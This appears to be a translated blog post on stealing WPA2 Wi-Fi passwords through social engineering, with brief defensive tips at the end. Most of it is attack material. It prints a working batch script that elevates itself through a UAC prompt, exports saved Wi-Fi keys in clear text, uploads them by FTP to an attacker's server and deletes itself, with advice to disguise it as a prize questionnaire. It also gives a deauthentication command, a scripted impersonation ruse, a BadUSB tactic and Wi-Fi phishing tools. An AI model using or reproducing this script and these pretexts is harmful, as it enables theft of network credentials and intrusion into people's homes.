Common social engineering methods for cracking WPA2 passwords and preventive measures

1. Introduction

What is social engineering? Social engineering is a type of attack that exploits the psychological weaknesses of the victim, such as instinctive reactions, curiosity, sympathy, trust, greed, etc., to perform illegal means such as deception, theft, and control. Social engineering can also be used to perform many illegal operations in wireless security. Here are a few examples of using social engineering to steal wpa2 passwords.

2. Mobile storage attack

A small capacity USB flash drive on Taobao stores a bat batch file in the USB flash drive and names it with titles that entice people to click on it, such as: Windows computer optimization, private photos, etc. In fact, the content of the bat file is this:

 @echo off  
 > nul 2 > &1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"  
 if '%errorlevel%' NEQ '0' (  
 goto UACPrompt  
 ) else ( goto gotAdmin )  
 :UACPrompt  
 echo Set UAC = CreateObject ^("Shell.Application"^) > "%temp%\getadmin.vbs"  
 echo UAC.ShellExecute "%~s0", "", "", "runas", 1 > > "%temp%\getadmin.vbs"  
 "%temp%\getadmin.vbs"  
 exit /B  
 :gotAdmin  
 if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )  
 md c:\win  
 netsh wlan export profile key = clear   folder = c :\win  
 echo open server ip > C:\config.txt  
 echo user account > > C:\config.txt  
 echo password > > C:\config.txt  
 echo mput c:\win\*.xml > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo yes > > C:\config.txt  
 echo bye > > C:\config.txt  
 ftp -n -s:"C:\config.txt"  
 del C:\config.txt  
 del C:\win\*.xml  
 del %0

This bat script will read the wifi information (including passwords) that the local machine has connected to, pack it into a folder and put it all on the server, then delete the traces and itself to prevent server information leakage. Finally, the attacker can choose the wifi he likes in his own ftp server.

Attack demonstration:

Open this script

The cmd interface pops up and disappears after 1 second (too fast to be captured), and the bat script disappears with it

View FTP Server

Wi-Fi information has been put up

Enter the server and open an xml file

Got the password

You can add functions to it to make the social engineering effect better. For example, you can name the script "Questionnaire with prizes for a certain company" and add a command to open the questionnaire to make the attack invisible.

3. Direct contact with the victim

(1) Using Deauthentication Attack

 aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0

During the break after get off work (when the Internet is generally used), the attacker uses the Internet disconnection attack on the victim. After an hour, the attacker knocks on the door and asks if the network is faulty and which company configured the network. Then the attacker claims that his network is also faulty and is from the same company. Then the attacker asks for the repair phone number and dials it. In fact, the attacker dials someone else or does not dial it at all. Then the attacker pretends to be the maintenance personnel and asks the attacker to restart the router. The attacker can then access the victim's router. If the attacker is lucky, there is a pin code on the back of the router, so the attacker can retreat. If not, the attacker applies further pressure and pretends to be asked by the maintenance personnel to open the router management interface and restart the router in the management interface, taking the opportunity to see the password. After the restart is complete, the attacker uses the mobile phone to ssh to Kali to stop the attack, creating the illusion that the restart successfully repaired the network, and then retreats.

(2) Combined with mobile storage attacks, with badusb, the attacker falsely claims that he has important files to send but his phone is out of battery and his family members are not off work yet. On the first day at work, the attacker does not want to leave a bad impression, so he directly accesses the victim's computer, inserts badusb, and executes bat scripts or Trojans.

(3) Claiming to be from a certain company or university and conducting a questionnaire survey on Internet users’ security awareness, they hand over the questionnaire asking for the wifi password to the victim, thereby obtaining the wifi password.

4. Wifi Phishing

Use tools such as fluxion and wifiphisher to carry out phishing attacks:

• https://github.com/FluxionNetwork/fluxion
• https://github.com/sophron/wifiphisher ——Project address

The general principle is to capture the handshake packet between the victim client and the wifi, implement a wifi denial of service attack on the target client, send a large number of dissociation packets, and then forge an ap with the same name. After the victim connects to the forged ap, it will be parsed to this page:

After the victim enters the password, it will automatically compare it with the captured handshake packet. If it is correct, the denial of service attack will be stopped. There are many tutorials on wifi phishing on the Internet, so I will not elaborate on them here.

4. Defensive measures

• Bind mac address, set up whitelist, and only allow your own machine to connect to wifi
• Hide your Wi-Fi broadcasts to avoid becoming a target
• Do not insert unknown USB drives, do not open unknown programs, and do not connect to unknown wireless signals.
• Try not to let strangers have access to your devices
• It is best to use wpa2 encryption for wifi, and make the password as complex as possible. Try not to use any information related to yourself in the password.
• Change the router management interface password and wifi password regularly
• It is best to turn off the wps function on the router
• Try not to use wifi master key or other similar software